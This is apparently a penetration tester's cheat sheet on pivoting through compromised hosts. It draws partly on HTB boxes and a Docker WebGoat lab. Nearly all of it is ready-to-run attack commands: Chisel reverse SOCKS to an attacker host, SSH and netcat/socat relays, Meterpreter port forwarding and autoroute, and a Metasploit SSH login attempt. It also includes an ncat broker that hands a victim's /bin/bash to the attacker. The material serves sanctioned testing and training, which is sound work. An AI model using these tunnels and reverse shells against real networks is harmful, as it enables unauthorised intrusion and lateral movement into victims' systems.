PIVOTING:

Pivot 

Chisel :

################################# Attacker Machine ######################## 
./chisel server -p 8080 --reverse  
#################################### Pivot Machine ########################  
chisel.exe client attacker_ip:8080 R:socks  
############################### Proxychains.conf ##########################  
socks5 127.0.0.1 1080 1112 
################################## Nmap Scan ##############################  
Always better to transfer binaries and scan from the pivot  
nmap.exe -sC -sV 10.10.10.10 -Pn -T5 // From Pivot machine  
proxychains nmap 10.10.10.10 -T5 -Pn -sT // From Kali Machine 
################################### Gobuster ##############################  
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/direct  




Pivot via SSH key (HTB Nibbles) 

  ssh -i root.key -L9000:web_ip:port ssh_ip 
    Ex : ssh -i root.key -L9000:10.10.10.75:80 10.10.10.73 




Pivot via root password (HTB Sense) 

  ssh -D1080 pivot_ip 
  Burp -> user options -> socks proxy -> use socks proxy 
  vi /etc/proxychains.conf 
  Change socks4(metasploit) to socks5(ssh)
  proxychains curl -k https://10.10.10.60 [ -k to ignore SSL]






netsh Port Proxy:
pivot c:\> netsh interface 
portproxy add v4tov4 
listenport=4000 
listenaddress=0.0.0.0 
connectport=22 
connectaddress=victim.tgt
attacker $ ssh
victimadmin@pivot.tgt





SSH trail through Linux:
attacker $ ssh
pivotAdmin@pivot.tgt
pivot $ ssh
victimAdmin@victim.tgt





PowerShell sessions through Windows:
attacker PS C:\> EnterPsSession –ComputerName
pivot.tgt
Or RDP session over Windows:
attacker c:\> mstsc.exe 
/v:Pivot.tgt
psexec.exe
Now, with command execution on pivot:
pivot C:\> ssh
victimadmin@victim.tgt
No SSH available? How about PuTTY?






SSH Pivots Require an sshd Setting:
Set GatewayPorts yes in 
/etc/ssh/sshd_config, then:
pivot # systemctl restart sshd




attacker $ ssh -fNL
1337:victim.tgt:22 
pivoter@pivot.tgt
attacker $ ssh
victimadmin@localhost -P 1337





SSH Local Port Forward
attacker $ ssh -fNR
4000:victim.tgt:22 
pivoter@pivot.tgt
attacker $ ssh
victimadmin@pivot.tgt -P 4000







ProxyChains:
attacker $ ssh 
pivotadmin@pivot.tgt -D 9050 -fN




Proxychains:
attacker $ proxychains ssh 
victimadmin@victim.tgt
And check /etc/proxychains.conf




Some SSH Command Line Options:
-f put ssh in the background after connecting
-N don’t execute a command; just forward some ports
-P num use “num” port for ssh




Netcat Port Forward:
pivot $ cd /tmp && mknod
backpipe p
pivot $ nc -lvp 4000 
0<backpipe | nc -v victim.tgt
22 1>backpipe
attacker $ ssh
victimadmin@pivot.tgt -P 4000


Meterpreter Port Forward:
pivot Meterpreter > portfwd
add –l 4000 –p 22 –r 
victim.tgt
attacker $ ssh
victimadmin@pivot.tgt -P 4000





Metasploit/Meterpreter Autoroute:
pivot Meterpreter > run 
post/multi/manage/autoroute 
SUBNET=pivotSubnet CMD=add
pivot Meterpreter > background
pivot msf > use 
scanner/ssh/ssh_login
pivot msf > set RHOSTS 
victim.tgt
pivot msf > set USERNAME 
victimAdmin
pivot msf > set PASSWORD 
victimPass
pivot msf > run






Socat Port Forward:
pivot $ socat TCPLISTEN:4000,fork 
TCP:victim.tgt:22
attacker $ ssh
victimadmin@pivot.tgt -P 4000





Ncat Connection Brokering:
Assumes code execution on victim
pivot$ ncat -vlp 4000 --broker
victim$ ncat pivot.tgt 4000 -e 
/bin/bash
attacker$ ncat pivot.tgt 4000







Method 1: Pivot with SSH & ProxyChains
This method leverages SSH with dynamic port forwarding to create a socks proxy, with proxychains to help with tools that can't use socks proxies. 



Setting up the tunnel
First login with SSH using dynamic port forwarding.
ssh -D localhost:9000 -f -N pentester@localhost -p 20022



Setup ProxyChains
in /etc/proxychains4.conf, add the following to the end of the file:
socks5 127.0.0.1 9000



$ proxychains nmap -sV webgoat





Method 2: Pivot With Meterpreter and socks proxy
Setup the connection and run a socks proxy over meterpreter:
docker exec -it pivots_metasploit_1 /bin/bash

$ proxychains nmap -sT -P0 -p8080,9001 172.20.0.3





Method 3: Pivot over a Ncat or Netcat relay
Tunnel as http proxy with ncat


## Target machine - setup ncat listener 
ncat -vv --listen 3128 --proxy-type http



## attacker machine (metasploit)
$ tail /etc/proxychains.conf -n 3

proxychains nmap -sT -P0 -p8080,9001 172.20.0.2




Reverse tunnel a single port with ncat

# On attacker / metasploit machine
$ docker exec -it pivots_metasploit_1 /bin/bash

$ ncat -lv --broker -m2 8080





# On ssh / box to pivot from
$ ssh pentester@localhost -p 20022
ncat -v metasploit 8080 -c "ncat -v webgoatlocal 8080"




Tunnel with netcat:
# Make backpipe to pass data around
mknod pivot p
# Setup the listener on pivot machine - forward traffic the
# pivot machine receives on port 8080 to the webgoat server 
# port 8080
nc -l -p 8080 0<pivot | nc webgoatlocal 8080 1>pivot



## On attacker machine (metasploit)
root@12f888991729:/$ wget ssh:8080/WebGoat
Saving to: ‘WebGoat'




Method: Installing tools on the target machine:




SSH pivot
ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>





Metasploit with Meterpreter
msf5 >route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j





Ncat HTTP proxy
$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:
$ ncat -lv --broker -m2 <port>

On pivot machine:
$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target"





Netcat Port Forwarder

On pivot machine:
mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot




Proxychains Setup

Install and configure proxychains
tail /etc/proxychains.conf
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>




Dynamic SSH Pivoting Command using proxy chains
  ssh -D 127.0.0.1:9050 root@192.168.2.2



Meterpreter Pivoting Cheatsheet:

portfwd add –l 3389 –p 3389 –r target-host               Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell

portfwd delete –l 3389 –p 3389 –r target-host            Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell

portfwd flush                                            Meterpreter delete all port forwards

portfwd list                                             Meterpreter list active port forwards

run autoroute -s 192.168.15.0/24                         Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0

run autoroute -p                                         Meterpreter list all active routes

route                                                    Meterpreter view available networks the compromised host can access

route add 192.168.14.0 255.255.255.0 3                   Meterpreter add route for 192.168.14.0/24 via Session 3.

route delete 192.168.14.0 255.255.255.0 3                Meterpreter delete route for 192.168.14.0/24 via Session 3.

route flush                                              Meterpreter delete all routes


In order to connect to the compromised machine you would run:

Connect to RDP via Meterpreter Port Forward
rdesktop 127.0.0.1



SSH Pivoting using Proxychains

Dynamic SSH Pivoting Command using proxy chains
ssh -D 127.0.0.1:9050 root@192.168.2.2